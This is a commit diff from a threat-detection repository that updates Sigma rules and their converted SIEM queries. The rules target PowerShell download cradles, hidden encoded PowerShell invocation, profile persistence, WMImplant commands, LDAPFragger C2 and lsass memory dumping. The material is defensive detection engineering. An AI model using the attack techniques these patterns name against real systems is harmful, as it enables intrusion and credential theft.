valitydev/atomic-threat-coverage
14
0
Fork 0
mirror of https://github.com/valitydev/atomic-threat-coverage.git synced 2024-11-06 09:35:21 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

fix #156

Browse Source
This commit is contained in:
Yugoslavskiy Daniil 2020-04-07 05:10:56 +02:00
parent 4d79a25830
commit 9b4b5e4ac6
92 changed files with 1823 additions and 839 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Atomic_Threat_Coverage/Data_Needed/DN_0050_1102_audit_log_was_cleared.md
View File

@ -1,8 +1,8 @@
| Title | DN_0050_1102_audit_log_was_cleared |
|:-------------------|:------------------|
| **Description** | This event generates every time Windows Security audit log was cleared |
| **Description** | Event 1102 is created whenever the Security log is cleared, REGARDLESS of the status of the Audit System Events audit policy |
| **Logging Policy** | <ul><li> Not existing </li></ul> |
| **References** | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md)</li></ul> |
| **References** | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md)</li><li>[https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102](https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102)</li></ul> |
| **Platform** | Windows |
| **Type** | Windows Log |
| **Channel** | Security |

27
Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_download.md
View File

@ -26,15 +26,20 @@ tags:
- attack.t1086
author: Florian Roth
date: 2017/03/05
modified: 2020/03/25
logsource:
product: windows
service: powershell
detection:
keywords:
Message:
- '*System.Net.WebClient).DownloadString(*'
- '*system.net.webclient).downloadfile(*'
condition: keywords
downloadfile:
Message|contains|all:
- 'System.Net.WebClient'
- '.DownloadFile('
downloadstring:
Message|contains|all:
- 'System.Net.WebClient'
- '.DownloadString('
condition: downloadfile or downloadstring
falsepositives:
- PowerShell scripts that download content from the Internet
level: medium
@ -48,42 +53,42 @@ level: medium
### es-qs
```
Message.keyword:(*System.Net.WebClient\\).DownloadString\\(* OR *system.net.webclient\\).downloadfile\\(*)
(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\\(* OR Message.keyword:*.DownloadString\\(*))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/65531a81-a694-4e31-ae04-f8ba5bc33759 <<EOF\n{\n "metadata": {\n "title": "Suspicious PowerShell Download",\n "description": "Detects suspicious PowerShell download command",\n "tags": [\n "attack.execution",\n "attack.t1086"\n ],\n "query": "Message.keyword:(*System.Net.WebClient\\\\).DownloadString\\\\(* OR *system.net.webclient\\\\).downloadfile\\\\(*)"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "Message.keyword:(*System.Net.WebClient\\\\).DownloadString\\\\(* OR *system.net.webclient\\\\).downloadfile\\\\(*)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious PowerShell Download\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/65531a81-a694-4e31-ae04-f8ba5bc33759 <<EOF\n{\n "metadata": {\n "title": "Suspicious PowerShell Download",\n "description": "Detects suspicious PowerShell download command",\n "tags": [\n "attack.execution",\n "attack.t1086"\n ],\n "query": "(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\\\\(* OR Message.keyword:*.DownloadString\\\\(*))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\\\\(* OR Message.keyword:*.DownloadString\\\\(*))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious PowerShell Download\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
Message.keyword:(*System.Net.WebClient\\).DownloadString\\(* *system.net.webclient\\).downloadfile\\(*)
(Message.keyword:*System.Net.WebClient* AND (Message.keyword:*.DownloadFile\\(* OR Message.keyword:*.DownloadString\\(*))
```
### splunk
```
(Message="*System.Net.WebClient).DownloadString(*" OR Message="*system.net.webclient).downloadfile(*")
(Message="*System.Net.WebClient*" (Message="*.DownloadFile(*" OR Message="*.DownloadString(*"))
```
### logpoint
```
Message IN ["*System.Net.WebClient).DownloadString(*", "*system.net.webclient).downloadfile(*"]
(Message="*System.Net.WebClient*" (Message="*.DownloadFile(*" OR Message="*.DownloadString(*"))
```
### grep
```
grep -P '^(?:.*.*System\\.Net\\.WebClient\\)\\.DownloadString\\(.*|.*.*system\\.net\\.webclient\\)\\.downloadfile\\(.*)'
grep -P '^(?:.*(?=.*.*System\\.Net\\.WebClient.*)(?=.*(?:.*(?:.*.*\\.DownloadFile\\(.*|.*.*\\.DownloadString\\(.*))))'
```

14
Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_invocation_generic.md
View File

@ -36,7 +36,7 @@ detection:
hidden:
- ' -w hidden '
- ' -window hidden '
- ' - windowstyle hidden '
- ' -windowstyle hidden '
noninteractive:
- ' -noni '
- ' -noninteractive '
@ -55,42 +55,42 @@ level: high
### es-qs
```
(\\*.keyword:(*\\ \\-enc\\ * OR *\\ \\-EncodedCommand\\ *) AND \\*.keyword:(*\\ \\-w\\ hidden\\ * OR *\\ \\-window\\ hidden\\ * OR *\\ \\-\\ windowstyle\\ hidden\\ *) AND \\*.keyword:(*\\ \\-noni\\ * OR *\\ \\-noninteractive\\ *))
(\\*.keyword:(*\\ \\-enc\\ * OR *\\ \\-EncodedCommand\\ *) AND \\*.keyword:(*\\ \\-w\\ hidden\\ * OR *\\ \\-window\\ hidden\\ * OR *\\ \\-windowstyle\\ hidden\\ *) AND \\*.keyword:(*\\ \\-noni\\ * OR *\\ \\-noninteractive\\ *))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/3d304fda-78aa-43ed-975c-d740798a49c1 <<EOF\n{\n "metadata": {\n "title": "Suspicious PowerShell Invocations - Generic",\n "description": "Detects suspicious PowerShell invocation command parameters",\n "tags": [\n "attack.execution",\n "attack.t1086"\n ],\n "query": "(\\\\*.keyword:(*\\\\ \\\\-enc\\\\ * OR *\\\\ \\\\-EncodedCommand\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-w\\\\ hidden\\\\ * OR *\\\\ \\\\-window\\\\ hidden\\\\ * OR *\\\\ \\\\-\\\\ windowstyle\\\\ hidden\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-noni\\\\ * OR *\\\\ \\\\-noninteractive\\\\ *))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(\\\\*.keyword:(*\\\\ \\\\-enc\\\\ * OR *\\\\ \\\\-EncodedCommand\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-w\\\\ hidden\\\\ * OR *\\\\ \\\\-window\\\\ hidden\\\\ * OR *\\\\ \\\\-\\\\ windowstyle\\\\ hidden\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-noni\\\\ * OR *\\\\ \\\\-noninteractive\\\\ *))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious PowerShell Invocations - Generic\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/3d304fda-78aa-43ed-975c-d740798a49c1 <<EOF\n{\n "metadata": {\n "title": "Suspicious PowerShell Invocations - Generic",\n "description": "Detects suspicious PowerShell invocation command parameters",\n "tags": [\n "attack.execution",\n "attack.t1086"\n ],\n "query": "(\\\\*.keyword:(*\\\\ \\\\-enc\\\\ * OR *\\\\ \\\\-EncodedCommand\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-w\\\\ hidden\\\\ * OR *\\\\ \\\\-window\\\\ hidden\\\\ * OR *\\\\ \\\\-windowstyle\\\\ hidden\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-noni\\\\ * OR *\\\\ \\\\-noninteractive\\\\ *))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(\\\\*.keyword:(*\\\\ \\\\-enc\\\\ * OR *\\\\ \\\\-EncodedCommand\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-w\\\\ hidden\\\\ * OR *\\\\ \\\\-window\\\\ hidden\\\\ * OR *\\\\ \\\\-windowstyle\\\\ hidden\\\\ *) AND \\\\*.keyword:(*\\\\ \\\\-noni\\\\ * OR *\\\\ \\\\-noninteractive\\\\ *))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Suspicious PowerShell Invocations - Generic\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(\\*.keyword:(* \\-enc * OR * \\-EncodedCommand *) AND \\*.keyword:(* \\-w hidden * OR * \\-window hidden * OR * \\- windowstyle hidden *) AND \\*.keyword:(* \\-noni * OR * \\-noninteractive *))
(\\*.keyword:(* \\-enc * OR * \\-EncodedCommand *) AND \\*.keyword:(* \\-w hidden * OR * \\-window hidden * OR * \\-windowstyle hidden *) AND \\*.keyword:(* \\-noni * OR * \\-noninteractive *))
```
### splunk
```
((" -enc " OR " -EncodedCommand ") (" -w hidden " OR " -window hidden " OR " - windowstyle hidden ") (" -noni " OR " -noninteractive "))
((" -enc " OR " -EncodedCommand ") (" -w hidden " OR " -window hidden " OR " -windowstyle hidden ") (" -noni " OR " -noninteractive "))
```
### logpoint
```
((" -enc " OR " -EncodedCommand ") (" -w hidden " OR " -window hidden " OR " - windowstyle hidden ") (" -noni " OR " -noninteractive "))
((" -enc " OR " -EncodedCommand ") (" -w hidden " OR " -window hidden " OR " -windowstyle hidden ") (" -noni " OR " -noninteractive "))
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*(?:.* -enc |.* -EncodedCommand )))(?=.*(?:.*(?:.* -w hidden |.* -window hidden |.* - windowstyle hidden )))(?=.*(?:.*(?:.* -noni |.* -noninteractive ))))'
grep -P '^(?:.*(?=.*(?:.*(?:.* -enc |.* -EncodedCommand )))(?=.*(?:.*(?:.* -w hidden |.* -window hidden |.* -windowstyle hidden )))(?=.*(?:.*(?:.* -noni |.* -noninteractive ))))'
```

99
Atomic_Threat_Coverage/Detection_Rules/powershell_suspicious_profile_create.md Normal file
View File

@ -0,0 +1,99 @@
| Title | Powershell Profile.ps1 Modification |
|:-------------------------|:------------------|
| **Description** | Detects a change in profile.ps1 of the Powershell profile |
| **ATT&amp;CK Tactic** | <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul> |
| **ATT&amp;CK Technique** | This Detection Rule wasn't mapped to ATT&amp;CK Technique yet |
| **Data Needed** | <ul><li>[DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)</li></ul> |
| **Trigger** | There is no documented Trigger for this Detection Rule yet |
| **Severity Level** | high |
| **False Positives** | <ul><li>System administrator create Powershell profile manually</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/](https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/)</li></ul> |
| **Author** | HieuTT35 |
## Detection Rules
### Sigma rule
```
title: Powershell Profile.ps1 Modification
id: b5b78988-486d-4a80-b991-930eff3ff8bf
status: experimental
description: Detects a change in profile.ps1 of the Powershell profile
references:
- https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/
author: HieuTT35
date: 2019/10/24
modified: 2020/04/03
logsource:
product: windows
service: sysmon
detection:
event:
EventID: 11
target1:
TargetFilename|contains|all:
- '\My Documents\PowerShell\'
- '\profile.ps1'
target2:
TargetFilename|contains|all:
- 'C:\Windows\System32\WindowsPowerShell\v1.0\'
- '\profile.ps1'
condition: event and (target1 or target2)
falsepositives:
- System administrator create Powershell profile manually
level: high
tags:
- attack.persistence
- attack.privilege_escalation
```
### es-qs
```
(EventID:"11" AND TargetFilename.keyword:*\\\\profile.ps1* AND (TargetFilename.keyword:*\\\\My\\ Documents\\\\PowerShell\\* OR TargetFilename.keyword:*C\\:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\*))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b5b78988-486d-4a80-b991-930eff3ff8bf <<EOF\n{\n "metadata": {\n "title": "Powershell Profile.ps1 Modification",\n "description": "Detects a change in profile.ps1 of the Powershell profile",\n "tags": [\n "attack.persistence",\n "attack.privilege_escalation"\n ],\n "query": "(EventID:\\"11\\" AND TargetFilename.keyword:*\\\\\\\\profile.ps1* AND (TargetFilename.keyword:*\\\\\\\\My\\\\ Documents\\\\\\\\PowerShell\\\\* OR TargetFilename.keyword:*C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\*))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(EventID:\\"11\\" AND TargetFilename.keyword:*\\\\\\\\profile.ps1* AND (TargetFilename.keyword:*\\\\\\\\My\\\\ Documents\\\\\\\\PowerShell\\\\* OR TargetFilename.keyword:*C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\WindowsPowerShell\\\\\\\\v1.0\\\\*))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Powershell Profile.ps1 Modification\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(EventID:"11" AND TargetFilename.keyword:*\\\\profile.ps1* AND (TargetFilename.keyword:*\\\\My Documents\\\\PowerShell\\* OR TargetFilename.keyword:*C\\:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\*))
```
### splunk
```
(EventID="11" TargetFilename="*\\\\profile.ps1*" (TargetFilename="*\\\\My Documents\\\\PowerShell\\*" OR TargetFilename="*C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\*"))
```
### logpoint
```
(event_id="11" TargetFilename="*\\\\profile.ps1*" (TargetFilename="*\\\\My Documents\\\\PowerShell\\*" OR TargetFilename="*C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\*"))
```
### grep
```
grep -P '^(?:.*(?=.*11)(?=.*.*\\profile\\.ps1.*)(?=.*(?:.*(?:.*.*\\My Documents\\PowerShell\\.*|.*.*C:\\Windows\\System32\\WindowsPowerShell\\v1\\.0\\.*))))'
```

112
Atomic_Threat_Coverage/Detection_Rules/powershell_wmimplant.md Normal file
View File

@ -0,0 +1,112 @@
| Title | WMImplant Hack Tool |
|:-------------------------|:------------------|
| **Description** | Detects parameters used by WMImplant |
| **ATT&amp;CK Tactic** | <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1047: Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)</li></ul> |
| **Data Needed** | <ul><li>[DN_0036_4104_windows_powershell_script_block](../Data_Needed/DN_0036_4104_windows_powershell_script_block.md)</li></ul> |
| **Trigger** | <ul><li>[T1047: Windows Management Instrumentation](../Triggers/T1047.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | <ul><li>Administrative scripts that use the same keywords.</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://github.com/FortyNorthSecurity/WMImplant](https://github.com/FortyNorthSecurity/WMImplant)</li></ul> |
| **Author** | NVISO |
## Detection Rules
### Sigma rule
```
title: WMImplant Hack Tool
id: 8028c2c3-e25a-46e3-827f-bbb5abf181d7
status: experimental
description: Detects parameters used by WMImplant
references:
- https://github.com/FortyNorthSecurity/WMImplant
tags:
- attack.execution
- attack.t1047
author: NVISO
date: 2020/03/26
logsource:
product: windows
service: powershell
description: "Script block logging must be enabled"
detection:
selection:
ScriptBlockText|contains:
- "WMImplant"
- " change_user "
- " gen_cli "
- " command_exec "
- " disable_wdigest "
- " disable_winrm "
- " enable_wdigest "
- " enable_winrm "
- " registry_mod "
- " remote_posh "
- " sched_job "
- " service_mod "
- " process_kill "
# - " process_start "
- " active_users "
- " basic_info "
# - " drive_list "
# - " installed_programs "
- " power_off "
- " vacant_system "
- " logon_events "
condition: selection
falsepositives:
- Administrative scripts that use the same keywords.
level: high
```
### es-qs
```
ScriptBlockText.keyword:(*WMImplant* OR *\\ change_user\\ * OR *\\ gen_cli\\ * OR *\\ command_exec\\ * OR *\\ disable_wdigest\\ * OR *\\ disable_winrm\\ * OR *\\ enable_wdigest\\ * OR *\\ enable_winrm\\ * OR *\\ registry_mod\\ * OR *\\ remote_posh\\ * OR *\\ sched_job\\ * OR *\\ service_mod\\ * OR *\\ process_kill\\ * OR *\\ active_users\\ * OR *\\ basic_info\\ * OR *\\ power_off\\ * OR *\\ vacant_system\\ * OR *\\ logon_events\\ *)
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/8028c2c3-e25a-46e3-827f-bbb5abf181d7 <<EOF\n{\n "metadata": {\n "title": "WMImplant Hack Tool",\n "description": "Detects parameters used by WMImplant",\n "tags": [\n "attack.execution",\n "attack.t1047"\n ],\n "query": "ScriptBlockText.keyword:(*WMImplant* OR *\\\\ change_user\\\\ * OR *\\\\ gen_cli\\\\ * OR *\\\\ command_exec\\\\ * OR *\\\\ disable_wdigest\\\\ * OR *\\\\ disable_winrm\\\\ * OR *\\\\ enable_wdigest\\\\ * OR *\\\\ enable_winrm\\\\ * OR *\\\\ registry_mod\\\\ * OR *\\\\ remote_posh\\\\ * OR *\\\\ sched_job\\\\ * OR *\\\\ service_mod\\\\ * OR *\\\\ process_kill\\\\ * OR *\\\\ active_users\\\\ * OR *\\\\ basic_info\\\\ * OR *\\\\ power_off\\\\ * OR *\\\\ vacant_system\\\\ * OR *\\\\ logon_events\\\\ *)"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "ScriptBlockText.keyword:(*WMImplant* OR *\\\\ change_user\\\\ * OR *\\\\ gen_cli\\\\ * OR *\\\\ command_exec\\\\ * OR *\\\\ disable_wdigest\\\\ * OR *\\\\ disable_winrm\\\\ * OR *\\\\ enable_wdigest\\\\ * OR *\\\\ enable_winrm\\\\ * OR *\\\\ registry_mod\\\\ * OR *\\\\ remote_posh\\\\ * OR *\\\\ sched_job\\\\ * OR *\\\\ service_mod\\\\ * OR *\\\\ process_kill\\\\ * OR *\\\\ active_users\\\\ * OR *\\\\ basic_info\\\\ * OR *\\\\ power_off\\\\ * OR *\\\\ vacant_system\\\\ * OR *\\\\ logon_events\\\\ *)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'WMImplant Hack Tool\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
ScriptBlockText.keyword:(*WMImplant* * change_user * * gen_cli * * command_exec * * disable_wdigest * * disable_winrm * * enable_wdigest * * enable_winrm * * registry_mod * * remote_posh * * sched_job * * service_mod * * process_kill * * active_users * * basic_info * * power_off * * vacant_system * * logon_events *)
```
### splunk
```
(ScriptBlockText="*WMImplant*" OR ScriptBlockText="* change_user *" OR ScriptBlockText="* gen_cli *" OR ScriptBlockText="* command_exec *" OR ScriptBlockText="* disable_wdigest *" OR ScriptBlockText="* disable_winrm *" OR ScriptBlockText="* enable_wdigest *" OR ScriptBlockText="* enable_winrm *" OR ScriptBlockText="* registry_mod *" OR ScriptBlockText="* remote_posh *" OR ScriptBlockText="* sched_job *" OR ScriptBlockText="* service_mod *" OR ScriptBlockText="* process_kill *" OR ScriptBlockText="* active_users *" OR ScriptBlockText="* basic_info *" OR ScriptBlockText="* power_off *" OR ScriptBlockText="* vacant_system *" OR ScriptBlockText="* logon_events *")
```
### logpoint
```
ScriptBlockText IN ["*WMImplant*", "* change_user *", "* gen_cli *", "* command_exec *", "* disable_wdigest *", "* disable_winrm *", "* enable_wdigest *", "* enable_winrm *", "* registry_mod *", "* remote_posh *", "* sched_job *", "* service_mod *", "* process_kill *", "* active_users *", "* basic_info *", "* power_off *", "* vacant_system *", "* logon_events *"]
```
### grep
```
grep -P '^(?:.*.*WMImplant.*|.*.* change_user .*|.*.* gen_cli .*|.*.* command_exec .*|.*.* disable_wdigest .*|.*.* disable_winrm .*|.*.* enable_wdigest .*|.*.* enable_winrm .*|.*.* registry_mod .*|.*.* remote_posh .*|.*.* sched_job .*|.*.* service_mod .*|.*.* process_kill .*|.*.* active_users .*|.*.* basic_info .*|.*.* power_off .*|.*.* vacant_system .*|.*.* logon_events .*)'
```

2
Atomic_Threat_Coverage/Detection_Rules/sysmon_in_memory_assembly_execution.md
View File

@ -25,7 +25,7 @@ description: Detects the access to processes by other suspicious processes which
few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain
routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious.
status: experimental
date: 27/10/2019
date: 2019/10/27
author: Perez Diego (@darkquassar), oscd.community
references:
- https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/

2
Atomic_Threat_Coverage/Detection_Rules/sysmon_minidumwritedump_lsass.md
View File

@ -23,7 +23,7 @@ status: experimental
description: Detects the use of MiniDumpWriteDump API for dumping lsass.exe memory in a stealth way. Tools like ProcessHacker and some attacker tradecract use this
API found in dbghelp.dll or dbgcore.dll. As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and
transfer it over the network back to the attacker's machine.
date: 27/10/2019
date: 2019/10/27
modified: 2019/11/13
author: Perez Diego (@darkquassar), oscd.community
references:

2
Atomic_Threat_Coverage/Detection_Rules/sysmon_possible_dns_rebinding.md
View File

File diff suppressed because one or more lines are too long

99
Atomic_Threat_Coverage/Detection_Rules/sysmon_susp_adsi_cache_usage.md Normal file
View File

@ -0,0 +1,99 @@
| Title | Suspicious ADSI-Cache Usage By Unknown Tool |
|:-------------------------|:------------------|
| **Description** | detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger. |
| **ATT&amp;CK Tactic** | <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1041: Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041)</li></ul> |
| **Data Needed** | <ul><li>[DN_0015_11_windows_sysmon_FileCreate](../Data_Needed/DN_0015_11_windows_sysmon_FileCreate.md)</li></ul> |
| **Trigger** | <ul><li>[T1041: Exfiltration Over Command and Control Channel](../Triggers/T1041.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | <ul><li>Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961](https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961)</li><li>[https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/](https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/)</li><li>[https://github.com/fox-it/LDAPFragger](https://github.com/fox-it/LDAPFragger)</li></ul> |
| **Author** | xknow @xknow_infosec |
## Detection Rules
### Sigma rule
```
title: Suspicious ADSI-Cache Usage By Unknown Tool
id: 75bf09fa-1dd7-4d18-9af9-dd9e492562eb
description: detects the usage of ADSI (LDAP) operations by tools. This may also detect tools like LDAPFragger.
status: experimental
date: 2019/03/24
author: xknow @xknow_infosec
references:
- https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961
- https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/
- https://github.com/fox-it/LDAPFragger
tags:
- attack.t1041
- attack.persistence
logsource:
product: windows
service: sysmon
detection:
selection_1:
EventID: 11
TargetFilename: '*\Local\Microsoft\Windows\SchCache\*.sch'
selection_2:
Image|contains:
- 'C:\windows\system32\svchost.exe'
- 'C:\windows\system32\dllhost.exe'
- 'C:\windows\system32\mmc.exe'
- 'C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe'
condition: selection_1 and not selection_2
falsepositives:
- Other legimate tools, which do ADSI (LDAP) operations, e.g. any remoting activity by MMC, Powershell, Windows etc.
level: high
```
### es-qs
```
((EventID:"11" AND TargetFilename.keyword:*\\\\Local\\\\Microsoft\\\\Windows\\\\SchCache\\*.sch) AND (NOT (Image.keyword:(*C\\:\\\\windows\\\\system32\\\\svchost.exe* OR *C\\:\\\\windows\\\\system32\\\\dllhost.exe* OR *C\\:\\\\windows\\\\system32\\\\mmc.exe* OR *C\\:\\\\windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe*))))
```
### xpack-watcher
```
